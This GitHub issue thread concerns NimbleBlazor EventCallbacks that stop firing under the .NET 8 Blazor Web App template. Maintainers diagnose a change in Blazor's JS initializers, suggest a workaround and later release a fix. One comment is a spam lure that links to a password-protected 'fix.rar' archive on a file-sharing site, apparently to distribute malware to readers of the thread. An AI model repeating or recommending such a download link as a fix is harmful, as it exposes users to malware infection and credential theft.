### ISSUE TITLE
Blazor EventCallbacks are not invoked with apps using .NET 8 template

### ISSUE THREAD

**Issue by epetersoni** [ni/nimble#2355]
# 🐛 Bug Report

Our app was initially created with the Blazor Server App .NET 7 template in VisualStudio. We recently [followed the guide](https://learn.microsoft.com/en-us/aspnet/core/migration/70-80?view=aspnetcore-8.0&tabs=visual-studio#convert-a-blazor-server-app-into-a-blazor-web-app) to update it to the .NET 8 Blazor Web App template.

It looks like at least some Nimble `EventCallback`s are now not getting invoked. Two examples are the `NimbleBanner` `OpenChanged`, and the `NimbleMenuButton` `Toggle`.

## 💻 Repro or Code Sample

* Use VisualStudio to create a new Blazor Web App using the .NET 8 template.
* Add the `NimbleBlazor` package (`18.0.0` is currently the latest) and required Nimble script / fonts.
* Put a `NimbleBanner` component with an `OpenChanged` callback on a page, and with `Open="true"`.
* Put anything in the callback method implementation so you can tell when it's invoked.
* Run the app and dismiss the banner.
* The callback is not invoked.
* If you follow the same instructions, but use the Blazor Server App template with .NET 6 or .NET 7, then the callback is invoked.

## 🤔 Expected Behavior

The `EventCallback` should get invoked.

## 😯 Current Behavior

The `EventCallback` is not invoked.

## 💁 Possible Solution

Official Nimble .NET 8 support. I'm not sure exactly what difference is causing the behavior change.

## 🔦 Context

Since updating our app to use the .NET 8 template, a few pieces of functionality that were relying on callbacks are now not working.

We didn't have a specific reason for updating to the .NET 8 template, so we'll need to evaluate what all the callback-related bugs are and whether we should revert the update and / or wait for fixes to this bug.

## 🌍 Your Environment

* OS & Device: Windows PC
* Browser: any

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jattasNI** [comment]
@epetersoni could you attach a zip of the the .NET 8 you used to reproduce this?

I added this issue as acceptance criteria under #1667 so we'll plan to tackle it as part of that (presumably before .NET 6 goes out of support).

**Comment by epetersoni** [comment]
@jattasNI 
[net8_no_nimble_callback.zip](https://github.com/user-attachments/files/16763926/net8_no_nimble_callback.zip)

**Comment by msmithNI** [comment]
@epetersoni It looks like this is due to the changes to the [Blazor startup process and JS initializers](https://learn.microsoft.com/en-us/aspnet/core/blazor/fundamentals/startup?view=aspnetcore-8.0) for .NET 8. 

NimbleBlazor relies on the `afterStarted` callback which is now a "classic"/deprecated initializer, which is not called by default.  
Blazor provides a way to opt back into the classic initialization behavior, and that looks like a workaround to this issue:
```html
    <script src="_framework/blazor.web.js" autostart="false"></script>
    <script src="_content/NimbleBlazor/nimble-components/all-components-bundle.min.js"></script>
    <script>
        Blazor.start({ enableClassicInitializers: true });
    </script>
```
However, that Microsoft page states "However, legacy initializer execution is unpredictable."

[BlazorEventCallbacks.zip](https://github.com/user-attachments/files/17139479/BlazorEventCallbacks.zip)

Once we update Nimble Blazor to target .NET 8, we'll update our JS initialization code to use the new methods, so it's probably best to wait for that. ([HLD for that work](https://github.com/ni/nimble/blob/main/specs/nimble-blazor/blazor-net8-upgrade-hld.md))

**Comment by msmithNI** [comment]
NimbleBlazor v19.0.0 (requiring .NET 8) is now available, which should resolve this (we updated our JS scripts to use the updated initialization callbacks from Blazor).

If you run into issues, feel free to ping us or reopen this.
